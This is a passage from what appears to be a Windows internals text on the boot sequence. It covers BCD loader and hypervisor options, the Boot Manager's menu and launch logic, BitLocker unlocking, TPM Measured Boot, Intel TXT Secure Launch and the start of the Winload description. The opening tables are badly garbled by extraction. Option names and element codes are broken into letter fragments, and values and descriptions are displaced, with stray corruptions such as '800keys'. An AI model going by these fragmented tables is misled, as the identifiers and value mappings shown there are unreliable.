HAL, so this breakpoint is the earliest one
possible (unless boot debugging is used). If the
switch is used without the /DEBUG switch, the
system will present a blue screen with a STOP
code of 0x00000078 (PHASE0_ EXCEPTION).
n
o
v
es
a
Boolean
BC
DE_
OS
LO
AD
ER_
TY
PE_
DIS
AB
LE_
VE
SA_
BIO
S
Disables the usage of VESA display modes.
o
pt
io
n
se
di
t
Boolean
OP
TIO
NS_
EDI
T_O
NE_
TIM
E
Enables the options editor in the Boot Manager.
With this option, Boot Manager allows the user
to interactively set on-demand command-line
options and switches for the current boot. This is
equivalent to pressing F10.
o
s
d
e
vi
c
e
GUID
OS_
DE
VIC
E
Specifies the device on which the operating
system is installed.
p
a
e
Default,
ForceE
nable,
ForceDi
sable
PA
E_P
OLI
CY
Default allows the boot loader to determine
whether the system supports PAE and loads the
PAE kernel. ForceEnable forces this behavior,
while ForceDisable forces the loader to load the
non-PAE version of the Windows kernel, even if
the system is detected as supporting x86 PAEs
and has more than 4 GB of physical memory.
However, non-PAE x86 kernels are not
supported anymore in Windows 10.
p
ci
e
x
pr
es
s
Default,
ForceDi
sable
PCI
_EX
PRE
SS_
PO
LIC
Y
Can be used to disable support for PCI Express
buses and devices.
p
er
f
m
e
m
Size in
MB
PER
FO
RM
AN
CE_
DA
TA_
ME
MO
RY
Size of the buffer to allocate for performance
data logging. This option acts similarly to the
removememory element, since it prevents
Windows from seeing the size specified as
available memory.
q
ui
et
b
o
ot
Boolean
DIS
AB
LE_
BO
OT_
DIS
PL
AY
Instructs Windows not to initialize the VGA
video driver responsible for presenting
bitmapped graphics during the boot process. The
driver is used to display boot progress
information, so disabling it disables the ability of
Windows to show this information.
ra
m
di
s
ki
m
a
g
el
e
n
gt
h
Length
in bytes
RA
MD
ISK
_IM
AG
E_L
EN
GT
H
Size of the ramdisk specified.
ra
m
di
s
ki
m
a
g
e
of
fs
et
Offset
in bytes
RA
MD
ISK
_IM
AG
E_O
FFS
ET
If the ramdisk contains other data (such as a
header) before the virtual file system, instructs
the boot loader where to start reading the
ramdisk file from.
ra
m
di
s
k
s
di
p
at
h
Image
file
name
RA
MD
ISK
_SD
I_P
AT
H
Specifies the name of the SDI ramdisk to load.
ra
m
di
s
kt
ft
p
bl
o
c
k
si
z
e
Block
size
RA
MD
ISK
_TF
TP_
BL
OC
K_S
IZE
If loading a WIM ramdisk from a network
Trivial FTP (TFTP) server, specifies the block
size to use.
ra
m
di
s
kt
ft
p
cl
ie
nt
p
Port
number
RA
MD
ISK
_TF
TP_
CLI
EN
T_P
OR
T
If loading a WIM ramdisk from a network TFTP
server, specifies the port.
or
t
ra
m
di
s
kt
ft
p
w
in
d
o
w
si
z
e
Windo
w size
RA
MD
ISK
_TF
TP_
WI
ND
OW
_SI
ZE
If loading a WIM ramdisk from a network TFTP
server, specifies the window size to use.
re
m
o
v
e
m
e
m
or
y
Size in
bytes
RE
MO
VE_
ME
MO
RY
Specifies an amount of memory Windows won’t
use.
re
st
ri
ct
a
pi
Cluster
number
RES
TRI
CT_
API
C_C
LU
Defines the largest APIC cluster number to be
used by the system.
c
cl
u
st
er
STE
R
re
s
u
m
e
o
bj
e
ct
Object
GUID
ASS
OCI
AT
ED_
RES
UM
E_O
BJE
CT
Describes which application to use for resuming
from hibernation, typically Winresume.exe.
sa
fe
b
o
ot
Minima
l,
Networ
k,
DsRepa
ir
SAF
EB
OO
T
Specifies options for a safe-mode boot. Minimal
corresponds to safe mode without networking,
Network to safe mode with networking, and
DsRepair to safe mode with Directory Services
Restore mode. (See the “Safe mode” section later
in this chapter.)
sa
fe
b
o
ot
al
te
rn
at
es
h
el
l
Boolean
SAF
EB
OO
T_A
LTE
RN
AT
E_S
HE
LL
Tells Windows to use the program specified by
the
HKLM\SYSTEM\CurrentControlSet\Control\Saf
eBoot\AlternateShell value as the graphical shell
rather than the default, which is Windows
Explorer. This option is referred to as safe mode
with command prompt in the alternate boot
menu.
s
o
s
Boolean
SOS
Causes Windows to list the device drivers
marked to load at boot time and then to display
the system version number (including the build
number), amount of physical memory, and
number of processors.
s
y
st
e
m
ro
ot
String
SYS
TE
M_
RO
OT
Specifies the path, relative to osdevice, in which
the operating system is installed.
ta
rg
et
n
a
m
e
Name
KE
RN
EL_
DE
BU
GG
ER_
US
B_T
AR
GE
TN
AM
E
For USB debugging, assigns a name to the
machine that is being debugged.
tp
m
b
o
ot
e
Default,
ForceDi
sable,
ForceE
nable
TP
M_
BO
OT_
EN
TR
Forces a specific TPM Boot Entropy policy to be
selected by the boot loader and passed on to the
kernel. TPM Boot Entropy, when used, seeds the
kernel’s random number generator (RNG) with
data obtained from the TPM (if present).
nt
ro
p
y
OP
Y_P
OLI
CY
u
se
fi
r
m
w
ar
e
p
ci
se
tti
n
g
s
Boolean
US
E_F
IR
MW
AR
E_P
CI_
SET
TIN
GS
Stops Windows from dynamically assigning
IO/IRQ resources to PCI devices and leaves the
devices configured by the BIOS. See Microsoft
Knowledge Base article 148501 for more
information.
u
se
le
g
a
c
y
a
pi
c
m
o
d
e
Boolean
US
E_L
EG
AC
Y_
API
C_
MO
DE
Forces usage of basic APIC functionality even
though the chipset reports extended APIC
functionality as present. Used in cases of
hardware errata and/or incompatibility.
u
se
p
h
y
si
c
al
d
es
ti
n
at
io
n
Boolean
US
E_P
HY
SIC
AL_
DE
STI
NA
TIO
N,
Forces the use of the APIC in physical
destination mode.
u
se
pl
at
fo
r
m
cl
o
c
k
Boolean
US
E_P
LA
TF
OR
M_
CL
OC
K
Forces usage of the platforms’s clock source as
the system’s performance counter.
v
g
a
Boolean
US
E_V
GA
_D
RIV
ER
Forces Windows to use the VGA display driver
instead of the third-party high-performance
driver.
w
Boolean
WI
Used by Windows PE, this option causes the
in
p
e
NP
E
configuration manager to load the registry
SYSTEM hive as a volatile hive such that
changes made to it in memory are not saved back
to the hive image.
x
2
a
pi
c
p
ol
ic
y
Disable
d,
Enabled
,
Default
X2
API
C_P
OLI
CY
Specifies whether extended APIC functionality
should be used if the chipset supports it.
Disabled is equivalent to setting
uselegacyapicmode, whereas Enabled forces
ACPI functionality on even if errata are detected.
Default uses the chipset’s reported capabilities
(unless errata are present).
x
sa
v
e
p
ol
ic
y
Integer
XS
AV
EP
OLI
CY
Forces the given XSAVE policy to be loaded
from the XSAVE Policy Resource Driver
(Hwpolicy.sys).
x
sa
v
e
a
d
df
e
at
ur
e
0-
Integer
XS
AV
EA
DD
FE
AT
UR
E0-
7
Used while testing support for XSAVE on
modern Intel processors; allows for faking that
certain processor features are present when, in
fact, they are not. This helps increase the size of
the CONTEXT structure and confirms that
applications work correctly with extended
features that might appear in the future. No
actual extra functionality will be present,
however.
7
x
sa
v
er
e
m
o
v
ef
e
at
ur
e
Integer
XS
AV
ER
EM
OV
EFE
AT
UR
E
Forces the entered XSAVE feature not to be
reported to the kernel, even though the processor
supports it.
x
sa
v
e
pr
o
c
es
s
or
s
m
as
k
Integer
XS
AV
EPR
OC
ESS
OR
SM
AS
K
Bitmask of which processors the XSAVE policy
should apply to.
x
sa
v
e
di
Boolean
XS
AV
EDI
SA
BL
Turns off support for the XSAVE functionality
even though the processor supports it.
sa
bl
e
E
3 All the BCD elements codes for the Windows OS Loader start with BCDE_OSLOADER_TYPE,
but this has been omitted due to limited space.
Table 12-5 BCD options for the Windows Hypervisor loader (hvloader)
BCD
Elem
ent
Valu
es
BCD
Element
Code4
Meaning
hyper
visorl
aunch
type
Off
Auto
HYPERVI
SOR_LAU
NCH_TYP
E
Enables loading of the hypervisor on a
Hyper-V system or forces it to be
disabled.
hyper
visord
ebug
Bool
ean
HYPERVI
SOR_DEB
UGGER_
ENABLE
D
Enables or disables the Hypervisor
Debugger.
hyper
visord
ebugt
ype
Seria
l
1394
None
Net
HYPERVI
SOR_DEB
UGGER_
TYPE
Specifies the Hypervisor Debugger type
(through a serial port or through an
IEEE-1394 or network interface).
hyper
visori
Defa
ult
HYPERVI
SOR_IOM
Enables or disables the hypervisor DMA
Guard, a feature that blocks direct
omm
upolic
y
Enab
le
Disa
ble
MU_POLI
CY
memory access (DMA) for all hot-
pluggable PCI ports until a user logs in
to Windows.
hyper
visor
msrfil
terpol
icy
Disa
ble
Enab
le
HYPERVI
SOR_MS
R_FILTE
R_POLIC
Y
Controls whether the root partition is
allowed to access restricted MSRs
(model specific registers).
hyper
visor
mmio
nxpol
icy
Disa
ble
Enab
le
HYPERVI
SOR_MM
IO_NX_P
OLICY
Enables or disables the No-Execute (NX)
protection for UEFI runtime service code
and data memory regions.
hyper
visore
nforc
edcod
einteg
rity
Disa
ble
Enab
le
Strict
HYPERVI
SOR_ENF
ORCED_
CODE_IN
TEGRITY
Enables or disables the Hypervisor
Enforced Code Integrity (HVCI), a
feature that prevents the root partition
kernel from allocating unsigned
executable memory pages.
hyper
visors
chedu
lertyp
e
Class
ic
Core
Root
HYPERVI
SOR_SCH
EDULER_
TYPE
Specifies the hypervisor’s partitions
scheduler type.
hyper
visord
isable
slat
Bool
ean
HYPERVI
SOR_SLA
T_DISA
BLED
Forces the hypervisor to ignore the
presence of the second layer address
translation (SLAT) feature if supported
by the processor.
hyper
visorn
umpr
oc
Integ
er
HYPERVI
SOR_NU
M_PROC
Specifies the maximum number of
logical processors available to the
hypervisor.
hyper
visorr
ootpr
ocper
node
Integ
er
HYPERVI
SOR_RO
OT_PROC
_PER_NO
DE
Specifies the total number of root virtual
processors per node.
hyper
visorr
ootpr
oc
Integ
er
HYPERVI
SOR_RO
OT_PROC
Specifies the maximum number of
virtual processors in the root partition.
hyper
visorb
audrat
e
Baud
rate
in
bps
HYPERVI
SOR_DEB
UGGER_
BAUDRA
TE
If using serial hypervisor debugging,
specifies the baud rate to use.
hyper
visorc
hanne
l
Chan
nel
num
ber
from
0 to
62
HYPERVI
SOR_DEB
UGGER_1
394_CHA
NNEL
If using FireWire (IEEE 1394)
hypervisor debugging, specifies the
channel number to use.
hyper
visord
ebugp
ort
CO
M
port
num
ber
HYPERVI
SOR_DEB
UGGER_P
ORT_NU
MBER
If using serial hypervisor debugging,
specifies the COM port to use.
hyper
visoru
selarg
evtlb
Bool
ean
HYPERVI
SOR_USE
_LARGE_
VTLB
Enables the hypervisor to use a larger
number of virtual TLB entries.
hyper
visorh
ostip
IP
addr
ess
(bina
ry
form
at)
HYPERVI
SOR_DEB
UGGER_
NET_HOS
T_IP
Specifies the IP address of the target
machine (the debugger) used in
hypervisor network debugging.
hyper
visorh
ostpor
t
Integ
er
HYPERVI
SOR_DEB
UGGER_
NET_HOS
T_PORT
Specifies the network port used in
hypervisor network debugging.
hyper
visoru
sekey
Strin
g
HYPERVI
SOR_DEB
UGGER_
NET_KEY
Specifies the encryption key used for
encrypting the debug packets sent
through the wire.
hyper
visorb
uspar
ams
Strin
g
HYPERVI
SOR_DEB
UGGER_
BUSPAR
Specifies the bus, device, and function
numbers of the network adapter used for
hypervisor debugging.
AMS
hyper
visord
hcp
Bool
ean
HYPERVI
SOR_DEB
UGGER_
NET_DH
CP
Specifies whether the Hypervisor
Debugger should use DHCP for getting
the network interface IP address.
4 All the BCD elements codes for the Windows Hypervisor Loader start with
BCDE_OSLOADER_TYPE, but this has been omitted due to limited space.
All the entries in the BCD store play a key role in the startup sequence.
Inside each boot entry (a boot entry is a BCD object), there are listed all the
boot options, which are stored into the hive as registry subkeys (as shown in
Figure 12-5). These options are called BCD elements. The Windows Boot
Manager is able to add or remove any boot option, either in the physical hive
or only in memory. This is important because, as we describe later in the
section “The boot menu,” not all the BCD options need to reside in the
physical hive.
Figure 12-5 An example screenshot of the Windows Boot Manager’s BCD
objects and their associated boot options (BCD elements).
If the Boot Configuration Data hive is corrupt, or if some error has
occurred while parsing its boot entries, the Boot Manager retries the
operation using the Recovery BCD hive. The Recovery BCD hive is
normally stored in \EFI\Microsoft\Recovery\BCD. The system could be
configured for direct use of this store, skipping the normal one, via the
recoverybcd parameter (stored in the UEFI boot variable) or via the
Bootstat.log file.
The system is ready to load the Secure Boot policies, show the boot menu
(if needed), and launch the boot application. The list of boot certificates that
the firmware can or cannot trust is located in the db and dbx UEFI
authenticated variables. The code integrity boot library reads and parses the
UEFI variables, but these control only whether a particular boot manager
module can be loaded. Once the Windows Boot Manager is launched, it
enables you to further customize or extend the UEFI-supplied Secure Boot
configuration with a Microsoft-provided certificates list. The Secure Boot
policy file (stored in \EFI\Microsoft\Boot\SecureBootPolicy.p7b), the
platform manifest polices files (.pm files), and the supplemental policies (.pol
files) are parsed and merged with the policies stored in the UEFI variables.
Because the kernel code integrity engine ultimately takes over, the additional
policies contain OS-specific information and certificates. In this way, a
secure edition of Windows (like the S version) could verify multiple
certificates without consuming precious UEFI resources. This creates the root
of trust because the files that specify new customized certificates lists are
signed by a digital certificate contained in the UEFI allowed signatures
database.
If not disabled by boot options (nointegritycheck or testsigning) or by a
Secure Boot policy, the Boot Manager performs a self-verification of its own
integrity: it opens its own file from the hard disk and validates its digital
signature. If Secure Boot is on, the signing chain is validated against the
Secure Boot signing policies.
The Boot Manager initializes the Boot Debugger and checks whether it
needs to display an OEM bitmap (through the BGRT system ACPI table). If
so, it clears the screen and shows the logo. If Windows has enabled the BCD
setting to inform Bootmgr of a hibernation resume (or of a hybrid boot), this
shortcuts the boot process by launching the Windows Resume Application,
Winresume.efi, which will read the contents of the hibernation file into
memory and transfer control to code in the kernel that resumes a hibernated
system. That code is responsible for restarting drivers that were active when
the system was shut down. Hiberfil.sys is valid only if the last computer
shutdown was a hibernation or a hybrid boot. This is because the hibernation
file is invalidated after a resume to avoid multiple resumes from the same
point. The Windows Resume Application BCD object is linked to the Boot
Manager descriptor through a specific BCD element (called resumeobject,
which is described in the “Hibernation and Fast Startup” section later in this
chapter).
Bootmgr detects whether OEM custom boot actions are registered through
the relative BCD element, and, if so, processes them. At the time of this
writing, the only custom boot action supported is the launch of an OEM boot
sequence. In this way the OEM vendors can register a customized recovery
sequence invoked through a particular key pressed by the user at startup.
The boot menu
In Windows 8 and later, in the standard boot configurations, the classical
(legacy) boot menu is never shown because a new technology, modern boot,
has been introduced. Modern boot provides Windows with a rich graphical
boot experience while maintaining the ability to dive more deeply into boot-
related settings. In this configuration, the final user is able to select the OS
that they want to execute, even with touch-enabled systems that don’t have a
proper keyboard and mouse. The new boot menu is drawn on top of the
Win32 subsystem; we describe its architecture later in this chapter in the
”Smss, Csrss, and Wininit” section.
The bootmenupolicy boot option controls whether the Boot Loader should
use the old or new technology to show the boot menu. If there are no OEM
boot sequences, Bootmgr enumerates the system boot entry GUIDs that are
linked into the displayorder boot option of the Boot Manager. (If this value is
empty, Bootmgr relies on the default entry.) For each GUID found, Bootmgr
opens the relative BCD object and queries the type of boot application, its
startup device, and the readable description. All three attributes must exist;
otherwise, the Boot entry is considered invalid and will be skipped. If
Bootmgr doesn’t find a valid boot application, it shows an error message to
the user and the entire Boot process is aborted. The boot menu display
algorithm begins here. One of the key functions, BmpProcessBootEntry, is
used to decide whether to show the Legacy Boot menu:
■ If the boot menu policy of the default boot application (and not of the
Bootmgr entry) is explicitly set to the Modern type, the algorithm
exits immediately and launches the default entry through the
BmpLaunchBootEntry function. Noteworthy is that in this case no
user keys are checked, so it is not possible to force the boot process to
stop. If the system has multiple boot entries, a special BCD option5 is
added to the in-memory boot option list of the default boot
application. In this way, in the later stages of the System Startup,
Winlogon can recognize the option and show the Modern menu.
■ Otherwise, if the boot policy for the default boot application is legacy
(or is not set at all) and there is only an entry, BmpProcessBootEntry
checks whether the user has pressed the F8 or F10 key. These are
described in the bootmgr.xsl resource file as the Advanced Options
and Boot Options 800keys. If Bootmgr detects that one of the keys is
pressed at startup time, it adds the relative BCD element to the in-
memory boot options list of the default boot application (the BCD
element is not written to the disk). The two boot options are processed
later in the Windows Loader. Finally, BmpProcessBootEntry checks
whether the system is forced to display the boot menu even in case of
only one entry (through the relative “displaybootmenu” BCD option).
■ In case of multiple boot entries, the timeout value (stored as a BCD
option) is checked and, if it is set to 0, the default application is
immediately launched; otherwise, the Legacy Boot menu is shown
with the BmDisplayBootMenu function.
5 The multi-boot “special option” has no name. Its element code is
BCDE_LIBRARY_TYPE_MULTI_BOOT_SYSTEM (that corresponds to 0x16000071 in hexadecimal
value).
While displaying the Legacy Boot menu, Bootmgr enumerates the
installed boot tools that are listed in the toolsdisplayorder boot option of the
Boot Manager.
Launching a boot application
The last goal of the Windows Boot Manager is to correctly launch a boot
application, even if it resides on a BitLocker-encrypted drive, and manage the
recovery sequence in case something goes wrong. BmpLaunchBootEntry
receives a GUID and the boot options list of the application that needs to be
executed. One of the first things that the function does is check whether the
specified entry is a Windows Recovery (WinRE) entry (through a BCD
element). These kinds of boot applications are used when dealing with the
recovery sequence. If the entry is a WinRE type, the system needs to
determine the boot application that WinRE is trying to recover. In this case,
the startup device of the boot application that needs to be recovered is
identified and then later unlocked (in case it is encrypted).
The BmTransferExecution routine uses the services provided by the boot
library to open the device of the boot application, identify whether the device
is encrypted, and, if so, decrypt it and read the target OS loader file. If the
target device is encrypted, the Windows Boot Manager tries first to get the
master key from the TPM. In this case, the TPM unseals the master key only
if certain conditions are satisfied (see the next paragraph for more details). In
this way, if some startup configuration has changed (like the enablement of
Secure Boot, for example), the TPM won’t be able to release the key. If the
key extraction from the TPM has failed, the Windows Boot Manager displays
a screen similar to the one shown in Figure 12-6, asking the user to enter an
unlock key (even if the boot menu policy is set to Modern, because at this
stage the system has no way to launch the Modern Boot user interface). At
the time of this writing, Bootmgr supports four different unlock methods:
PIN, passphrase, external media, and recovery key. If the user is unable to
provide a key, the startup process is interrupted and the Windows recovery
sequence starts.
Figure 12-6 The BitLocker recovery procedure, which has been raised
because something in the boot configuration has changed.
The firmware is used to read and verify the target OS loader. The
verification is done through the Code Integrity library, which applies the
secure boot policies (both the systems and all the customized ones) on the
file’s digital signature. Before actually passing the execution to the target
boot application, the Windows Boot Manager needs to notify the registered
components (ETW and Measured Boot in particular) that the boot application
is starting. Furthermore, it needs to make sure that the TPM can’t be used to
unseal anything else.
Finally, the code execution is transferred to the Windows Loader through
BlImgStartBootApplication. This routine returns only in case of certain
errors. As before, the Boot Manager manages the latter situation by
launching the Windows Recovery Sequence.
Measured Boot
In late 2006, Intel introduced the Trusted Execution Technology (TXT),
which ensures that an authentic operating system is started in a trusted
environment and not modified or altered by an external agent (like malware).
The TXT uses a TPM and cryptographic techniques to provide measurements
of software and platform (UEFI) components. Windows 8.1 and later support
a new feature called Measured Boot, which measures each component, from
firmware up through the boot start drivers, stores those measurements in the
TPM of the machine, and then makes available a log that can be tested
remotely to verify the boot state of the client. This technology would not
exist without the TPM. The term measurement refers to a process of
calculating a cryptographic hash of a particular entity, like code, data
structures, configuration, or anything that can be loaded in memory. The
measurements are used for various purposes. Measured Boot provides
antimalware software with a trusted (resistant to spoofing and tampering) log
of all boot components that started before Windows. The antimalware
software uses the log to determine whether components that ran before it are
trustworthy or are infected with malware. The software on the local machine
sends the log to a remote server for evaluation. Working with the TPM and
non-Microsoft software, Measured Boot allows a trusted server on the
network to verify the integrity of the Windows startup process.
The main rules of the TPM are the following:
■ Provide a secure nonvolatile storage for protecting secrets
■ Provide platform configuration registers (PCRs) for storing
measurements
■ Provide hardware cryptographic engines and a true random number
generator
The TPM stores the Measured Boot measurements in PCRs. Each PCR
provides a storage area that allows an unlimited number of measurements in
a fixed amount of space. This feature is provided by a property of
cryptographic hashes. The Windows Boot Manager (or the Windows Loader
in later stages) never writes directly into a PCR register; it “extends” the PCR
content. The “extend” operation takes the current value of the PCR, appends
the new measured value, and calculates a cryptographic hash (SHA-1 or
SHA-256 usually) of the combined value. The hash result is the new PCR
value. The “extend” method assures the order-dependency of the
measurements. One of the properties of the cryptographic hashes is that they
are order-dependent. This means that hashing two values A and B produces
two different results from hashing B and A. Because PCRs are extended (not
written), even if malicious software is able to extend a PCR, the only effect is
that the PCR would carry an invalid measurement. Another property of the
cryptographic hashes is that it’s impossible to create a block of data that
produces a given hash. Thus, it’s impossible to extend a PCR to get a given
result, except by measuring the same objects in exactly the same order.
At the early stages of the boot process, the System Integrity module of the
boot library registers different callback functions. Each callback will be
called later at different points in the startup sequence with the goal of
managing measured-boot events, like Test Signing enabling, Boot Debugger
enabling, PE Image loading, boot application starting, hashing, launching,
exiting, and BitLocker unlocking. Each callback decides which kind of data
to hash and to extend into the TPM PCR registers. For instance, every time
the Boot Manager or the Windows Loader starts an external executable
image, it generates three measured boot events that correspond to different
phases of the Image loading: LoadStarting, ApplicationHashed, and
ApplicationLaunched. In this case, the measured entities, which are sent to
the PCR registers (11 and 12) of the TPM, are the following: hash of the
image, hash of the digital signature of the image, image base, and size.
All the measurements will be employed later in Windows when the system
is completely started, for a procedure called attestation. Because of the
uniqueness property of cryptographic hashes, you can use PCR values and
their logs to identify exactly what version of software is executing, as well as
its environment. At this stage, Windows uses the TPM to provide a TPM
quote, where the TPM signs the PCR values to assure that values are not
maliciously or inadvertently modified in transit. This guarantees the
authenticity of the measurements. The quoted measurements are sent to an
attestation authority, which is a trusted third-party entity that is able to
authenticate the PCR values and translate those values by comparing them
with a database of known good values. Describing all the models used for
attestation is outside the scope of this book. The final goal is that the remote
server confirms whether the client is a trusted entity or could be altered by
some malicious component.
Earlier we explained how the Boot Manager is able to automatically
unlock the BitLocker-encrypted startup volume. In this case, the system takes
advantage of another important service provided by the TPM: secure
nonvolatile storage. The TPM nonvolatile random access memory (NVRAM)
is persistent across power cycles and has more security features than system
memory. While allocating TPM NVRAM, the system should specify the
following:
■ Read access rights Specify which TPM privilege level, called
locality, can read the data. More importantly, specify whether any
PCRs must contain specific values in order to read the data.
■ Write access rights The same as above but for write access.
■ Attributes/permissions Provide optional authorizations values for
reading or writing (like a password) and temporal or persistent locks
(that is, the memory can be locked for write access).
The first time the user encrypts the boot volume, BitLocker encrypts its
volume master key (VMK) with another random symmetric key and then
“seals” that key using the extended TPM PCR values (in particular, PCR 7
and 11, which measure the BIOS and the Windows Boot sequence) as the
sealing condition. Sealing is the act of having the TPM encrypt a block of
data so that it can be decrypted only by the same TPM that has encrypted it,
only if the specified PCRs have the correct values. In subsequent boots, if the
“unsealing” is requested by a compromised boot sequence or by a different
BIOS configuration, TPM refuses the request to unseal and reveal the VMK
encryption key.
EXPERIMENT: Invalidate TPM measurements
In this experiment, you explore a quick way to invalidate the TPM
measurements by invalidating the BIOS configuration. Before
measuring the startup sequence, drivers, and data, Measured Boot
starts with a static measurement of the BIOS configuration (stored
in PCR1). The measured BIOS configuration data strictly depends
on the hardware manufacturer and sometimes even includes the
UEFI boot order list. Before starting the experiment, verify that
your system includes a valid TPM. Type tpm.msc in the Start
menu search box and execute the snap-in. The Trusted Platform
Module (TPM) Management console should appear. Verify that a
TPM is present and enabled in your system by checking that the
Status box is set to The TPM Is Ready For Use.
Start the BitLocker encryption of the system volume. If your
system volume is already encrypted, you can skip this step. You
must be sure to save the recovery key, though. (You can check the
recovery key by selecting Back Up Your Recovery Key, which is
located in the Bitlocker drive encryption applet of the Control
Panel.) Open File Explorer by clicking its taskbar icon, and
navigate to This PC. Right-click the system volume (the volume
that contains all the Windows files, usually C:) and select Turn On
BitLocker. After the initial verifications are made, select Let
Bitlocker Automatically Unlock My Drive when prompted on the
Choose How to Unlock Your Drive at Startup page. In this way,
the VMK will be sealed by the TPM using the boot measurements
as the “unsealing” key. Be careful to save or print the recovery key;
you’ll need it in the next stage. Otherwise, you won’t be able to
access your files anymore. Leave the default value for all the other
options.
After the encryption is complete, switch off your computer and
start it by entering the UEFI BIOS configuration. (This procedure
is different for each PC manufacturer; check the hardware user
manual for directions for entering the UEFI BIOS settings.) In the
BIOS configuration pages, simply change the boot order and then
restart your computer. (You can change the startup boot order by
using the UefiTool utility, which is in the downloadable files of the
book.) If your hardware manufacturer includes the boot order in the
TPM measurements, you should get the BitLocker recovery
message before Windows boots. Otherwise, to invalidate the TPM
measurements, simply insert the Windows Setup DVD or flash
drive before switching on the workstation. If the boot order is
correctly configured, the Windows Setup bootstrap code starts,
which prints the Press Any Key For Boot From CD Or DVD
message. If you don’t press any key, the system proceeds to boot
the next Boot entry. In this case, the startup sequence has changed,
and the TPM measurements are different. As a result, the TPM
won’t be able to unseal the VMK.
You can invalidate the TPM measurements (and produce the
same effects) if you have Secure Boot enabled and you try to
disable it. This experiment demonstrates that Measured Boot is tied
to the BIOS configuration.
Trusted execution
Although Measured Boot provides a way for a remote entity to confirm the
integrity of the boot process, it does not resolve an important issue: Boot
Manager still trusts the machine’s firmware code and uses its services to
effectively communicate with the TPM and start the entire platform. At the
time of this writing, attacks against the UEFI core firmware have been
demonstrated multiple times. The Trusted Execution Technology (TXT) has
been improved to support another important feature, called Secure Launch.
Secure Launch (also known as Trusted Boot in the Intel nomenclature)
provides secure authenticated code modules (ACM), which are signed by the
CPU manufacturer and executed by the chipset (and not by the firmware).
Secure Launch provides the support of dynamic measurements made to PCRs
that can be reset without resetting the platform. In this scenario, the OS
provides a special Trusted Boot (TBOOT) module used to initialize the
platform for secure mode operation and initiate the Secure Launch process.
An authenticated code module (ACM) is a piece of code provided by the
chipset manufacturer. The ACM is signed by the manufacturer, and its code
runs in one of the highest privilege levels within a special secure memory
that is internal to the processor. ACMs are invoked using a special GETSEC
instruction. There are two types of ACMs: BIOS and SINIT. While BIOS
ACM measures the BIOS and performs some BIOS security functions, the
SINIT ACM is used to perform the measurement and launch of the Operating
System TCB (TBOOT) module. Both BIOS and SINIT ACM are usually
contained inside the System BIOS image (this is not a strict requirement), but
they can be updated and replaced by the OS if needed (refer to the “Secure
Launch” section later in this chapter for more details).
The ACM is the core root of trusted measurements. As such, it operates at
the highest security level and must be protected against all types of attacks.
The processor microcode copies the ACM module in the secure memory and
performs different checks before allowing the execution. The processor
verifies that the ACM has been designed to work with the target chipset.
Furthermore, it verifies the ACM integrity, version, and digital signature,
which is matched against the public key hardcoded in the chipset fuses. The
GETSEC instruction doesn’t execute the ACM if one of the previous checks
fails.
Another key feature of Secure Launch is the support of Dynamic Root of
Trust Measurement (DRTM) by the TPM. As introduced in the previous
section, “Measured Boot,” 16 different TPM PCR registers (0 through 15)
provide storage for boot measurements. The Boot Manager could extend
these PCRs, but it’s not possible to clear their contents until the next platform
reset (or power up). This explains why these kinds of measurements are
called static measurements. Dynamic measurements are measurements made
to PCRs that can be reset without resetting the platform. There are six
dynamic PCRs (actually there are eight, but two are reserved and not usable
by the OS) used by Secure Launch and the trusted operating system.
In a typical TXT Boot sequence, the boot processor, after having validated
the ACM integrity, executes the ACM startup code, which measures critical
BIOS components, exits ACM secure mode, and jumps to the UEFI BIOS
startup code. The BIOS then measures all of its remaining code, configures
the platform, and verifies the measurements, executing the GETSEC
instruction. This TXT instruction loads the BIOS ACM module, which
performs the security checks and locks the BIOS configuration. At this stage
the UEFI BIOS could measure each option ROM code (for each device) and
the Initial Program Load (IPL). The platform has been brought to a state
where it’s ready to boot the operating system (specifically through the IPL
code).
The TXT Boot sequence is part of the Static Root of Trust Measurement
(SRTM) because the trusted BIOS code (and the Boot Manager) has been
already verified, and it’s in a good known state that will never change until
the next platform reset. Typically, for a TXT-enabled OS, a special TCB
(TBOOT) module is used instead of the first kernel module being loaded.
The purpose of the TBOOT module is to initialize the platform for secure
mode operation and initiate the Secure Launch. The Windows TBOOT
module is named TcbLaunch.exe. Before starting the Secure Launch, the
TBOOT module must be verified by the SINIT ACM module. So, there
should be some components that execute the GETSEC instructions and start
the DRTM. In the Windows Secure Launch model, this component is the
boot library.
Before the system can enter the secure mode, it must put the platform in a
known state. (In this state, all the processors, except the bootstrap one, are in
a special idle state, so no other code could ever be executed.) The boot
library executes the GETSEC instruction, specifying the SENTER operation.
This causes the processor to do the following:
1.
Validate the SINIT ACM module and load it into the processor’s
secure memory.
2.
Start the DRTM by clearing all the relative dynamic PCRs and then
measuring the SINIT ACM.
3.
Execute the SINIT ACM code, which measures the trusted OS code
and executes the Launch Control Policy. The policy determines
whether the current measurements (which reside in some dynamic
PCR registers) allow the OS to be considered “trusted.”
When one of these checks fails, the machine is considered to be under
attack, and the ACM issues a TXT reset, which prevents any kind of software
from being executed until the platform has been hard reset. Otherwise, the
ACM enables the Secure Launch by exiting the ACM mode and jumping to
the trusted OS entry point (which, in Windows is the TcbMain function of the
TcbLaunch.exe module). The trusted OS then takes control. It can extend and
reset the dynamic PCRs for every measurement that it needs (or by using
another mechanism that assures the chain of trust).
Describing the entire Secure Launch architecture is outside the scope of
this book. Please refer to the Intel manuals for the TXT specifications. Refer
to the “Secure Launch” section, later in this chapter, for a description of how
Trusted Execution is implemented in Windows. Figure 12-7 shows all the
components involved in the Intel TXT technology.
Figure 12-7 Intel TXT (Trusted Execution Technology) components.
The Windows OS Loader
The Windows OS Loader (Winload) is the boot application launched by the
Boot Manager with the goal of loading and correctly executing the Windows
kernel. This process includes multiple primary tasks:
■ Create the execution environment of the kernel. This involves
initializing, and using, the kernel’s page tables and developing a
memory map. The EFI OS Loader also sets up and initializes the
kernel’s stacks, shared user page, GDT, IDT, TSS, and segment
selectors.
■ Load into memory all modules that need to be executed or accessed
before the disk stack is initialized. These include the kernel and the
HAL because they handle the early initialization of basic services
once control is handed off from the OS Loader. Boot-critical drivers
and the registry system hive are also loaded into memory.
■ Determine whether Hyper-V and the Secure Kernel (VSM) should be
executed, and, if so, correctly load and start them.
■ Draw the first background animation using the new high-resolution
boot graphics library (BGFX, which replaces the old Bootvid.dll
driver).
■ Orchestrate the Secure Launch boot sequence in systems that support
Intel TXT. (For a complete description of Measured Boot, Secure
Launch, and Intel TXT, see the respective sections earlier in this
chapter). This task was originally implemented in the hypervisor
loader, but it has moved starting from Windows 10 October Update
(RS5).
The Windows loader has been improved and modified multiple times
during each Windows release. OslMain is the main loader function (called by
the Boot Manager) that (re)initializes the boot library and calls the internal
